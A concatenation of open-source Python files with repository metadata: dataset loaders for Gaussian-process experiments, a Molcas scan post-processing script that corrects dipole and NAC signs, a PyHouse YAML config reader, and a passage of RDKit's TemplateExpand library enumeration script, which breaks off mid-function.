* Jarrett RG. A note on the intervals between coal-mining disasters. Biometrika. 1979;66(1):191-3.
"""
data = []
train = pandas.read_csv('data/mining/data.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1].values[:, np.newaxis],
'test_Y': train.ix[:, 0].values[:, np.newaxis],
'test_X': train.ix[:, 1].values[:, np.newaxis],
'id': 1
})
return data
@staticmethod
def boston_data():
"""
Loads and returns data of the Boston housing dataset. Note that ``X`` is standardized.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Harrison Jr D, Rubinfeld DL. Hedonic housing prices and the demand for clean air. J Environ Econ Manage.
1978;5(1):81-102.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/boston_housing/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/boston_housing/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def abalone_data():
"""
Loads and returns data of Abalone dataset.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Bache K, Lichman M. {UCI} Machine Learning Repository [Internet]. 2013. Available from: http://archive.ics.uci.edu/ml
"""
data = []
for i in range(5, 11):
train = pandas.read_csv('data/abalone/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/abalone/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def creep_data():
"""
Loads and returns data of Creep dataset.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Cole D, Martin-Moran C, Sheard AG, Bhadeshia HKDH, MacKay DJC.
Modelling creep rupture strength of ferritic steel welds. Sci Technol Weld Join. 2000;5(2):81-9.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/creep/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/creep/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def mnist_data():
"""
Loads and returns data of MNIST dataset for all digits.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is imported from this project: http://deeplearning.net/tutorial/gettingstarted.html
"""
#############
# LOAD DATA #
#############
dataset = 'mnist.pkl.gz'
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print 'Downloading data from %s' % origin
urllib.urlretrieve(origin, dataset)
print '... loading data'
# Load the dataset
f = gzip.open(dataset, 'rb')
train_set, valid_set, test_set = cPickle.load(f)
f.close()
test_Y = np.zeros((test_set[1].shape[0], 10))
test_Y[np.arange(test_set[1].shape[0]), test_set[1]] = 1
train_Y = np.zeros((train_set[1].shape[0], 10))
train_Y[np.arange(train_set[1].shape[0]), train_set[1]] = 1
validation_Y = np.zeros((valid_set[1].shape[0], 10))
validation_Y[np.arange(valid_set[1].shape[0]), valid_set[1]] = 1
data = []
data.append({
'train_Y': np.vstack((train_Y, validation_Y)),
'train_X': np.vstack((train_set[0], valid_set[0])),
'test_Y': test_Y,
'test_X': test_set[0],
'id': 0
})
return data
@staticmethod
def sarcos_data():
"""
Loads and returns data of SARCOS dataset for joints 4 and 7. Note that ``X`` is standardized.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is originally from this website: http://www.gaussianprocess.org/gpml/data/.
The data is directly imported from the Matlab code on Gaussian process networks. The Matlab code to generate
data is 'data/matlab_code_data/sarcos.m'
"""
data = []
train = pandas.read_csv('data/sarcos/train_' +'.csv', header=None)
test = pandas.read_csv('data/sarcos/test_' + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0:1].values,
'train_X': train.ix[:, 2:].values,
'test_Y': test.ix[:, 0:1].values,
'test_X': test.ix[:, 2:].values,
'id': 0
})
return data
@staticmethod
def sarcos_all_joints_data():
"""
Loads and returns data of SARCOS dataset for all joints.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is originally from this website: http://www.gaussianprocess.org/gpml/data/.
The data here is directly imported from the Matlab code on Gaussian process networks.
The Matlab code to generate data is 'data/matlab_code_data/sarcos.m'
"""
data = []
train = pandas.read_csv('data/sarcos/train_all' +'.csv', header=None)
test = pandas.read_csv('data/sarcos/test_all' + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0:6].values,
'train_X': train.ix[:, 7:].values,
'test_Y': test.ix[:, 0:6].values,
'test_X': test.ix[:, 7:].values,
'id': 0
})
return data
|
adezfouli/savigp
|
GP/data_source.py
|
Python
|
apache-2.0
| 13,003
|
[
"Gaussian"
] |
37845f9dd4db2bbc8dd2aacdb37f4768d29e2098fd931f077d0012241667d598
|
'''
This scripts takes care of postprocessing and reorganizing/correcting
data after Molcas scan...
'''
from collections import namedtuple
from argparse import ArgumentParser
import glob
from itertools import repeat
import multiprocessing
import numpy as np
import os
from shutil import copy2
from quantumpropagator import (retrieve_hdf5_data, writeH5file,
npArrayOfFiles, printMatrix2D, createTabellineFromArray,
writeH5fileDict, readWholeH5toDict, chunksOf, err, good, warning,
printDict, stringTransformation3d, calc_g_G, readDirectionFile,
printProgressBar)
def read_single_arguments(single_inputs):
'''
This function reads the command line arguments
'''
parser = ArgumentParser()
parser.add_argument("-o", "--outputFolder",
dest="o",
type=str,
help="The location of the output folder")
parser.add_argument("-s", "--scanFolder",
dest="s",
type=str,
help="The location of the Grid folder")
parser.add_argument("-p", "--parallel",
dest="p",
type=int,
help="number of processors if you want it parallel")
parser.add_argument("-d", "--displacement",
dest="d",
nargs='+',
help="Corrector, takes two arguments:\n"
"Folder of h5 files\n"
"Folder of outputs\n")
parser.add_argument("-r", "--refine",
dest="r",
nargs='+',
help="refiner, takes three arguments:\n"
"Folder of non corr with nac\n"
"Folder of corr without nac\n"
"OutputFolder.\n")
args = parser.parse_args()
if args.o != None:
single_inputs = single_inputs._replace(outF=args.o)
if args.s != None:
single_inputs = single_inputs._replace(glob=args.s)
if args.p != None:
single_inputs = single_inputs._replace(proc=args.p)
if args.d != None:
single_inputs = single_inputs._replace(direction=args.d)
if args.r != None:
single_inputs = single_inputs._replace(refine=args.r)
return single_inputs
def createOutputFile(tupleI):
'''
given a project name, creates a single output file (not yet corrected)
tupleI :: (String,String) <- composed of (fold,outFol)
fold :: String <- the folder of a single calculation
outFol :: String <- the folder where the output is collected
'''
(fold,outFol) = tupleI
#print('doing ' + fold)
folder = os.path.dirname(fold)
proj = os.path.basename(fold)
root = folder +'/' + proj + '/' + proj
oroot = os.path.join(outFol,proj)
h5rasscf = root + '.rasscf.h5'
h5dipole = root + '.transDip.h5'
h5rassi = root + '.rassi.h5'
h5out = root + '.out'
a_exist = all([ os.path.isfile(f) for f in
#[h5rassi,h5rasscf,h5dipole]]) Soon we will not need out anymore
[h5rassi,h5rasscf,h5out,h5dipole]])
if a_exist:
log = proj + ': all files present'
boolean = True
[geom,aType,ener] = retrieve_hdf5_data(h5rasscf,
['CENTER_COORDINATES',
'CENTER_LABELS',
'ROOT_ENERGIES'])
[dipoles, transDen] = retrieve_hdf5_data(h5dipole,
['SFS_EDIPMOM',
'SFS_TRANSITION_DENSITIES'])
[overlap] = retrieve_hdf5_data(h5rassi,
['ORIGINAL_OVERLAPS'])
nstates = ener.size
nstatesNAC = 8 # states for nac are actually 8
natoms = aType.size
# I want to save only the low left corner of overlap [nstates:,:nstates]
if True:
NAC = parseNAC(h5out,nstatesNAC,natoms)
else:
warning("NAC PARSING TURNED OFF")
NAC = np.zeros((nstatesNAC,nstatesNAC,natoms,3))
outfile = oroot + '.all.h5'
outTuple = [('CENTER_COORDINATES', geom),
('CENTER_LABELS', aType),
('ROOT_ENERGIES', ener),
('DIPOLES', dipoles),
#('CI_VECTORS', ciVect),
#('TRANDENS',transDen),
('OVERLAP', overlap[nstates:,:nstates]),
('NAC', NAC)]
#print(overlap[nstates:,:nstates][:3,:3])
#print(overlap)
#try:
# if (overlap[nstates:,:nstates][:3,:3] == np.zeros((3,3))).all():
# log += 'dioK {}\n'.format(outfile)
#except:
# err(oroot)
try:
writeH5file(outfile,outTuple)
except OSError:
	# h5py reports write failures as OSError ("Unable to open file ...")
	print(outfile)
# count_nonzero does not work anymore with the new thing
log += ' -> ' + str(np.count_nonzero(NAC)/2)
else:
log = proj + ': this calculation is not completed'
boolean = False
return(log,boolean)
def parseNAC(fileN,nstates,natoms):
'''
I use bash here to quickly get out NAC values
fileOut :: filePath <- the output of molcas
'''
import subprocess
emptyMat = np.zeros((nstates,nstates,natoms,3))
# This is the most problem Bound function I can think of (bash)
command = 'grep -A22 "Total derivative coupling" ' + fileN + " | grep -B14 \"H15\" | grep -v '\-\-' | awk '{print $2, $3, $4}'"
#command = "grep norm: " + fileN + "| awk '{print $2}'"
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
# I am reading a list of lists(triplet) in bytes. I need to separate them
# this parser needs to filter out the b'' objects that come from the split() call.
# also, there is a problem with numbers not separated in molcas outputs,
# that is why we replace '-' # with ' -'
outputO = np.array([ getThreeNumbers(x) for x in output.split(b'\n') if x != b''])
outputDivided = list(chunksOf(outputO,natoms))
# I need to fill the NAC matrix with the elements I have...
for index in range(len(outputDivided)):
# indexes of out of diagonal terms
ind1 = np.triu_indices(nstates,1)[0][index]
ind2 = np.triu_indices(nstates,1)[1][index]
emptyMat[ind1, ind2] = outputDivided[index]
# tricky NAC, you're antisymmetric
emptyMat[ind2, ind1] = -outputDivided[index]
return(emptyMat)
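# Illustrative note on the filling above (added for clarity): the code assumes the
# coupling blocks arrive in upper-triangle order, so for nstates = 3 the chunks map to
#   outputDivided[0] -> NAC[0,1] (and -NAC[1,0])
#   outputDivided[1] -> NAC[0,2] (and -NAC[2,0])
#   outputDivided[2] -> NAC[1,2] (and -NAC[2,1])
# because np.triu_indices(3, 1) == (array([0, 0, 1]), array([1, 2, 2])).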
def getThreeNumbers(bytestr):
'''
this function exists because Molcas does not always give NAC in a suitable way
sometimes the grepped lines are like this
9736.8701781410642.89824311 4710.70644771
************** 8777.30913244 474.27759987
so I am using a few tricks to convert these values in something big, but still triplets of numbers
'''
res = (bytestr.replace(b'-',b' -')).split(b' ')
noEmpty = [ x for x in res if x != b'' ]
if len(noEmpty) < 3:
ris = [ 9999, 9999, 9999 ]
else:
ris = []
for elem in noEmpty:
try:
val = float(elem)
ris.append(val)
except ValueError:
ris.append(9999)
return(ris)
def unpackThingsFromParallel(listOfval):
'''
this unpacks the result list of tuples from the parallel execution
listOfval :: (String,Boolean) <- all the messages and values packed in
tuples
'''
log = '\n'.join([x[0] for x in listOfval])
length = len(listOfval)
trues = [x[1] for x in listOfval].count(True)
return(log,trues,length-trues)
def makeCubeGraph(phis,gammas,thetas):
'''
This supremely problem bound function, will create a dictionary of
"directions" to run analysis functions across the scan in the right order
'''
graph = {}
gammaI = gammas[0]
phiI = phis[0]
thetaL = thetas[-1]
gammaL = gammas[-1]
phiL = phis[-1]
for k in range(len(thetas)):
for j in range(len(gammas)):
for i in range(len(phis)):
name = '_'.join((phis[i],gammas[j],thetas[k]))
graph[name] = []
if phis[i] == phiI and gammas[j] == gammaI and thetas[k] != thetaL:
succt = '_'.join((phis[i],gammas[j],thetas[k+1]))
graph[name].append(succt)
if phis[i] == phiI and gammas[j] != gammaL:
succg = '_'.join((phis[i],gammas[j+1],thetas[k]))
graph[name].append(succg)
if phis[i] != phiL:
succp = '_'.join((phis[i+1],gammas[j],thetas[k]))
graph[name].append(succp)
# return the INVERSE dictionary, so I know from where I should take the
# correction vector
reverseGraph = dict((v,k) for k in graph for v in graph[k])
first = '_'.join((phis[0],gammas[0],thetas[0]))
return(graph,reverseGraph,first)
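# Hedged worked example (labels are made up): makeCubeGraph(['P0','P1'], ['G0'], ['T0'])
# returns
#   graph        == {'P0_G0_T0': ['P1_G0_T0'], 'P1_G0_T0': []}
#   reverseGraph == {'P1_G0_T0': 'P0_G0_T0'}
#   first        == 'P0_G0_T0'
# i.e. every point knows from which already-corrected neighbour it should take the
# sign-correction vector.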
def refineStuffs(folderO,folderE,folderOUTPUT,fn1,fn2):
'''
There is a folder, folderO, where the NACs are calculated but the dipoles are not corrected.
Then there is a folder folderE that has the correct dipoles, but nacs are 0.
I use the sign of the dipoles in folderE to correct the NAC when putting them into the new grid
'''
phis1,gammas1,thetas1 = readDirectionFile(fn1)
phis2,gammas2,thetas2 = readDirectionFile(fn2)
rootNameO = os.path.join(folderO,'zNorbornadiene')
rootNameE = os.path.join(folderE,'zNorbornadiene')
rootNameOut = os.path.join(folderOUTPUT,'zNorbornadiene')
flat_range_Phi = phis1[::-1]+phis2[1:]
flat_range_Gamma = gammas1[::-1]+gammas2[1:]
flat_range_Theta = (thetas1[::-1]+thetas2[1:])[::-1]
print('{}\n{}\n{}\n'.format(flat_range_Phi,flat_range_Gamma,flat_range_Theta))
dataToGet = ['DIPOLES', 'NAC']
phiL = len(flat_range_Phi)
gamL = len(flat_range_Gamma)
debug = False
for p, phiLab in enumerate(flat_range_Phi[:]):
for g, gamLab in enumerate(flat_range_Gamma[:]):
for t, theLab in enumerate(flat_range_Theta[:]):
elemT = '{}_{}_{}'.format(phiLab,gamLab,theLab)
THIS = '{}_{}.all.h5'.format(rootNameO,elemT)
NEXT = '{}_{}.corrected.h5'.format(rootNameE,elemT)
OUTN = '{}_{}.refined.h5'.format(rootNameOut,elemT)
[dipolesAllT, nacAllT] = retrieve_hdf5_data(THIS, dataToGet)
[dipolesAllN, nacAllN] = retrieve_hdf5_data(NEXT, dataToGet)
_,nstates,_ = dipolesAllT.shape
cutStates = 8
# I want out of diagonal pairs, so the double loop is correct like this,
# where 0,0 and 1,1 and 2,2 are not taken and corrected.
for i in range(cutStates):
for j in range(i):
uno = dipolesAllT[0,i,j]
due = dipolesAllN[0,i,j]
if debug:
strin = '\np {} g {} t {} i {} j {} 1 {} 2 {}'
print(strin.format(phiLab,gamLab,theLab,i,j,uno,due))
if np.sign(uno) == np.sign(due):
nacAllN[i,j] = nacAllT[i,j]
nacAllN[j,i] = -nacAllT[i,j]
else:
nacAllN[i,j] = -nacAllT[i,j]
nacAllN[j,i] = nacAllT[i,j]
# file handling
allValues = readWholeH5toDict(NEXT)
allValues['DIPOLES'] = dipolesAllN[:,:cutStates,:cutStates]
allValues['NAC'] = nacAllN
writeH5fileDict(OUTN,allValues)
printProgressBar(p*gamL+g,gamL*phiL,prefix = 'H5 refined:')
def correctorFromDirection(folderO,folderE,fn1,fn2):
'''
This function is the corrector that follows the direction files...
suuuuper problem bound
'''
phis1,gammas1,thetas1 = readDirectionFile(fn1)
phis2,gammas2,thetas2 = readDirectionFile(fn2)
#phis = phis[0:3]
#gammas = gammas[0:3]
#thetas = thetas[0:3]
rootNameO = os.path.join(folderO,'zNorbornadiene_')
rootNameE = os.path.join(folderE,'zNorbornadiene_')
graph1,revgraph1,first = makeCubeGraph(phis1,gammas1,thetas1)
graph2,revgraph2,_ = makeCubeGraph(phis2,gammas1,thetas1)
graph3,revgraph3,_ = makeCubeGraph(phis1,gammas2,thetas1)
graph4,revgraph4,_ = makeCubeGraph(phis2,gammas2,thetas1)
graph5,revgraph5,_ = makeCubeGraph(phis1,gammas1,thetas2)
graph6,revgraph6,_ = makeCubeGraph(phis2,gammas1,thetas2)
graph7,revgraph7,_ = makeCubeGraph(phis1,gammas2,thetas2)
graph8,revgraph8,_ = makeCubeGraph(phis2,gammas2,thetas2)
cutAt = 14
# correct first point here - True means "I am the first"
print('\n\n----------THIS IS INITIAL -> cut at {}:\n'.format(cutAt))
newsign = np.ones(cutAt)
correctThis(first,newsign,rootNameE,rootNameO,cutAt,True)
# correct the other here key is file to be corrected VALUE the one where to
# take the correction
#print("{}\n{}\n{}".format(phis,gammas,thetas))
#print(' ')
#printDict(graph)
#print(' ')
#printDict(revgraph)
revgraphSum = {**revgraph8,
**revgraph7,
**revgraph6,
**revgraph5,
**revgraph4,
**revgraph3,
**revgraph2,
**revgraph1}
#print(len(revgraphSum))
for key, value in revgraphSum.items():
fnIn = rootNameO + key + '.all.h5'
if os.path.isfile(fnIn):
print('\n\n----------THIS IS {} from {} -> cut at {}:\n'.format(key,value,cutAt))
fnE = rootNameE + value + '.corrected.h5'
newsign = retrieve_hdf5_data(fnE,'ABS_CORRECTOR')
correctThis(key,newsign,rootNameE,rootNameO,cutAt)
good('Hey, you are using a hardcoded direction file')
def correctThis(elem,oneDarray,rootNameE,rootNameO,cutAt,first=None):
'''
This is the corrector. Go go go
elem :: String <- the label of the h5 file
oneDarray :: np.array(NSTATES) <- this is the 1D vector that tells us how
sign changed in LAST CALCULATION
'''
first = first or False
dataToGet = ['ROOT_ENERGIES','OVERLAP', 'DIPOLES', 'NAC']
fileN = rootNameO + elem + '.all.h5'
# I add a string LOL in front of elem to make it equal to a normal file name, but elem here
# is just the three labels (small dirty fix)
# stringTransformation3d changes the UNITS of the labels, it is not anymore a simple tofloat
phiA,_,gammaA,_,thetA,_ = stringTransformation3d("LOL_" + elem)
[enerAll, overlapsM, dipolesAll, nacAll] = retrieve_hdf5_data(fileN, dataToGet)
if first:
(_, nstates, _) = dipolesAll.shape
overlapsAll = np.identity(nstates)
else:
(nstates, _ ) = overlapsM.shape
overlapsAll = overlapsM # leave this here for now
nacCUT = 8
# let's cut something
energies = enerAll[:cutAt]
dipoles = dipolesAll[:, :cutAt, :cutAt]
overlaps = overlapsAll[:cutAt, :cutAt]
nacs = nacAll[:nacCUT, :nacCUT]
correctionArray1DABS, overlap_one_zero = createOneAndZero(overlaps, oneDarray)
correctionMatrix = createTabellineFromArray(correctionArray1DABS)
new_dipoles = dipoles * correctionMatrix
# here I use the fact that correctionMatrix is ALWAYS 2d
# so I loop over the it
new_nacs = np.empty_like(nacs)
for i in range(nacCUT):
for j in range(nacCUT):
new_nacs[i,j] = nacs[i,j] * correctionMatrix[i,j]
print('\n')
print('This is overlap:')
printMatrix2D(overlaps,2)
print('\n\n')
print('from Previous\n {}\neffective correction:\n {}'.format(oneDarray,correctionArray1DABS))
print('\n\n')
print('this is correction Matrix')
printMatrix2D(correctionMatrix,2)
print('\n\n')
print('These are the old dipoles:')
printMatrix2D(dipoles[0],2)
print('\n\n')
print('These are the new dipoles:')
printMatrix2D(new_dipoles[0],2)
print('\n\n')
print('These are the old NACS:')
printMatrix2D(nacs[:,:,9,1],2)
print('\n\n')
print('These are the new NACS:')
printMatrix2D(new_nacs[:,:,9,1],2)
# file handling
corrFNO = rootNameE + elem + '.corrected.h5'
allValues = readWholeH5toDict(fileN)
allValues['DIPOLES'] = new_dipoles
allValues['NAC'] = new_nacs
allValues['ABS_CORRECTOR'] = correctionArray1DABS
allValues['OVERLAPONEZERO'] = overlap_one_zero
allValues['KINETIC_COEFFICIENTS'] = calc_g_G(phiA,gammaA,thetA)
allValues['ROOT_ENERGIES'] = energies
writeH5fileDict(corrFNO,allValues)
print('\n\nfile {} written'.format(corrFNO))
def createOneAndZero(mat, oneDarray):
'''
mat :: np.array(X,Y) <- an overlap matrix
given a matrix with overlaps this will return an array with 1 and -1
This will determine sign changes for this step.
This function is quite convoluted. Rows are new states, so I go along rows
and seek for the absolute maximum value. if this is negative I put a -1, or
a +1 if it is positive, then I take out the state I just assigned (so it
cannot be assigned again). This is to avoid overlap matrices with double 1
or no 1 at all (they happen).
'''
# Maximum implementation
newMat = np.empty_like(mat)
ind = 0
taken = []
for line in mat:
i = np.copy(line)
i[taken] = 0
maxL,minL = (i.max(),i.min())
if -minL > maxL:
newMat[ind] = np.where(i==minL,-1,0)
take = np.argwhere(i==minL)[0][0]
taken += [take]
else:
newMat[ind] = np.where(i==maxL, 1,0)
take = np.argwhere(i==maxL)[0][0]
taken += [take]
ind+=1
booltest = np.all(np.count_nonzero(newMat,axis = 0) == 1)
# I check if all columns and rows have exactly one one.
newcorrVector = oneDarray @ newMat.T
if not booltest:
print('This is an overlap matrix that you should check')
print('entrance matrix')
printMatrix2D(mat)
print('entrance array:')
print(oneDarray)
print('exit matrix')
printMatrix2D(newMat)
print('exit array:')
print(newcorrVector)
return (newcorrVector,newMat)
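# Hedged worked example (numbers are made up): for
#   mat = np.array([[ 0.99, 0.10],
#                   [ 0.05,-0.98]])
#   oneDarray = np.array([1.0, 1.0])
# the row-wise extrema give newMat == [[1, 0], [0, -1]], so the function returns
# (array([ 1., -1.]), newMat): state 0 keeps its sign and state 1 flips it.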
single_inputs = namedtuple("single_input", ("direction","refine","glob","outF","proc"))
stringOutput1 = '''
{}
finished -> {}
problems -> {}
file report written
'''
def main():
'''
from a grid folder to a folder ready to be propagated
'''
fold = '/home/alessio/Desktop/NAC_CORRECTION_NOVEMBER2018'
fn1 = os.path.join(fold, 'directions1')
fn2 = os.path.join(fold, 'directions2')
warning('still a hardcoded direction file')
o_inputs = single_inputs("","","","",1)
inp = read_single_arguments(o_inputs)
if inp.direction == "" and inp.refine == "":
folders = npArrayOfFiles(inp.glob)
fold = folders[:] # this does nothing, but I use it to try less files at the time
pool = multiprocessing.Pool(processes = inp.proc)
resultP = pool.map(createOutputFile, zip(fold, repeat(inp.outF)))
(logAll,finished,problems) = unpackThingsFromParallel(resultP)
results = stringOutput1.format(logAll, finished, problems)
with open('report','w') as f:
f.write(results)
print(results)
elif inp.refine != "":
# here the code for the refining thing. big stuff...
print(inp.refine[0],inp.refine[1],fn1,fn2)
refineStuffs(inp.refine[0],inp.refine[1],inp.refine[2],fn1,fn2)
else:
correctorFromDirection(inp.direction[0],inp.direction[1],fn1,fn2)
if __name__ == "__main__":
main()
|
acuzzio/GridQuantumPropagator
|
Scripts/PostProcessing3dData.py
|
Python
|
gpl-3.0
| 19,928
|
[
"MOLCAS"
] |
ad2975b4acda4644d52dc9b1eb2210e6c738fb7ef5662a423affe74e90559f96
|
"""
@name: PyHouse_Install/src/Install/private.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2016-2016 by D. Brian Kimmel
@license: MIT License
@note: Created May 13, 2016
@Summary: Create .private
Create the /etc/pyhouse/.private.yaml file that will hold the secret information used by the pyhouse system.
HOSTNAME: hostname
MQTT: true
NODE_RED: false
"""
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
def __init__(self):
self.hostname = None
class API(object):
"""
"""
def __init__(self):
self.m_private = Private()
self.read_yaml()
def read_yaml(self):
l_file = open(Y_FILE)
# use safe_load instead of load
self.m_private = yaml.safe_load(l_file)
l_file.close()
def write_yaml(self):
l_file = open('newtree.yaml', "w")
yaml.dump(self.m_private, l_file)
l_file.close()
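# Hedged usage sketch (not in the original file; assumes the YAML holds the keys
# listed in the module docstring):
#   api = API()                       # read_yaml() loads /etc/pyhouse/.private.yaml
#   print(api.m_private['HOSTNAME'])  # safe_load returns a plain dict
#   api.write_yaml()                  # dumps the dict to ./newtree.yaml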
if __name__ == '__main__':
API()
# ## END DBK
|
DBrianKimmel/PyHouse_Install
|
src/Install/private.py
|
Python
|
mit
| 1,018
|
[
"Brian"
] |
5821a80e647083756533f85084c7aa5fc0fa0d2ac5e14c103dca7d3cebbc71c8
|
# $Id: TemplateExpand.py 1053 2008-07-30 12:03:29Z landrgr1 $
#
# Created by Greg Landrum August, 2006
#
#
from rdkit import RDLogger as logging
logger = logging.logger()
logger.setLevel(logging.INFO)
from rdkit import Chem
from rdkit.Chem import Crippen
from rdkit.Chem import AllChem
from rdkit.Chem.ChemUtils.AlignDepict import AlignDepict
import sys
_version="0.8.0"
_greet="This is TemplateExpand version %s"%_version
_usage="""
Usage: TemplateExpand [options] template <sidechains>
Unless otherwise indicated, the template and sidechains are assumed to be
Smiles
Each sidechain entry should be:
[-r] SMARTS filename
The SMARTS pattern is used to recognize the attachment point,
if the -r argument is not provided, then atoms matching the pattern
will be removed from the sidechains.
or
-n filename
where the attachment atom is the first atom in each molecule
The filename provides the list of potential sidechains.
options:
-o filename.sdf: provides the name of the output file, otherwise
stdout is used
--sdf : expect the sidechains to be in SD files
--moltemplate: the template(s) are in a mol/SD file, new depiction(s)
will not be generated unless the --redraw argument is also
provided
--smilesFileTemplate: extract the template(s) from a SMILES file instead of
expecting SMILES on the command line.
--redraw: generate a new depiction for the molecular template(s)
--useall:
or
--useallmatches: generate a product for each possible match of the attachment
pattern to each sidechain. If this is not provided, the first
match (not canonically defined) will be used.
--force: by default, the program prompts the user if the library is
going to contain more than 1000 compounds. This argument
disables the prompt.
--templateSmarts="smarts": provides a space-delimited list containing the SMARTS
patterns to be used to recognize attachment points in
the template
--autoNames: when set this toggle causes the resulting compounds to be named
based on their sequence id in the file, e.g.
"TemplateEnum: Mol_1", "TemplateEnum: Mol_2", etc.
otherwise the names of the template and building blocks (from
the input files) will be combined to form a name for each
product molecule.
--3D : Generate 3d coordinates for the product molecules instead of 2d coordinates,
requires the --moltemplate option
--tether : refine the 3d conformations using a tethered minimization
"""
def Usage():
import sys
print >>sys.stderr,_usage
sys.exit(-1)
nDumped=0
def _exploder(mol,depth,sidechains,core,chainIndices,autoNames=True,templateName='',
resetCounter=True,do3D=False,useTethers=False):
global nDumped
if resetCounter:
nDumped=0
ourChains = sidechains[depth]
patt = '[%d*]'%(depth+1)
patt = Chem.MolFromSmiles(patt)
for i,(chainIdx,chain) in enumerate(ourChains):
tchain = chainIndices[:]
tchain.append((i,chainIdx))
rs = Chem.ReplaceSubstructs(mol,patt,chain,replaceAll=True)
if rs:
r = rs[0]
if depth<len(sidechains)-1:
for entry in _exploder(r,depth+1,sidechains,core,tchain,
autoNames=autoNames,templateName=templateName,
resetCounter=0,do3D=do3D,useTethers=useTethers):
yield entry
else:
try:
Chem.SanitizeMol(r)
except ValueError:
import traceback
traceback.print_exc()
continue
if not do3D:
if r.HasSubstructMatch(core):
try:
AlignDepict(r,core)
except:
import traceback
traceback.print_exc()
print >>sys.stderr,Chem.MolToSmiles(r)
else:
print >>sys.stderr,'>>> no match'
AllChem.Compute2DCoords(r)
else:
r = Chem.AddHs(r)
AllChem.ConstrainedEmbed(r,core,useTethers)
Chem.Kekulize(r)
if autoNames:
tName = "TemplateEnum: Mol_%d"%(nDumped+1)
else:
tName = templateName
for bbI,bb in enumerate(tchain):
bbMol = sidechains[bbI][bb[0]][1]
if bbMol.HasProp('_Name'):
bbNm = bbMol.GetProp('_Name')
else:
bbNm = str(bb[1])
tName += '_' + bbNm
r.SetProp("_Name",tName)
r.SetProp('seq_num',str(nDumped+1))
r.SetProp('reagent_indices','_'.join([str(x[1]) for x in tchain]))
for bbI,bb in enumerate(tchain):
bbMol = sidechains[bbI][bb[0]][1]
if bbMol.HasProp('_Name'):
bbNm = bbMol.GetProp('_Name')
else:
bbNm = str(bb[1])
r.SetProp('building_block_%d'%(bbI+1),bbNm)
for propN in bbMol.GetPropNames():
r.SetProp('building_block_%d_%s'%(bbI+1,propN),bbMol.GetProp(propN))
nDumped += 1
if not nDumped%100:
logger.info('Done %d molecules'%nDumped)
yield r
def Explode(template,sidechains,outF,autoNames=True,do3D=False,useTethers=False):
chainIndices=[]
core = Chem.DeleteSubstructs(template,Chem.MolFromSmiles('[*]'))
try:
templateName = template.GetProp('_Name')
except KeyError:
templateName="template"
for mol in _exploder(template,0,sidechains,core,chainIndices,autoNames=autoNames,
templateName=templateName,do3D=do3D,useTethers=useTethers):
outF.write(Chem.MolToMolBlock(mol))
for pN in mol.GetPropNames():
print >>outF,'> <%s>\n%s\n'%(pN,mol.GetProp(pN))
print >>outF,'$$$$'
def MoveDummyNeighborsToBeginning(mol,useAll=False):
dummyPatt=Chem.MolFromSmiles('[*]')
matches = mol.GetSubstructMatches(dummyPatt)
res = []
for match in matches:
matchIdx = match[0]
smi = Chem.MolToSmiles(mol,True,rootedAtAtom=matchIdx)
entry = Chem.MolFromSmiles(smi)
# entry now has [*] as atom 0 and the neighbor
# as atom 1. Cleave the [*]:
entry = Chem.DeleteSubstructs(entry,dummyPatt)
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
res.append(entry)
if not useAll:
break
return res
def ConstructSidechains(suppl,sma=None,replace=True,useAll=False):
if sma:
try:
patt = Chem.MolFromSmarts(sma)
except:
logger.error('could not construct pattern from smarts: %s'%sma,
exc_info=True)
return None
else:
patt = None
if replace:
replacement = Chem.MolFromSmiles('[*]')
res = []
for idx,mol in enumerate(suppl):
if not mol:
continue
if patt:
if not mol.HasSubstructMatch(patt):
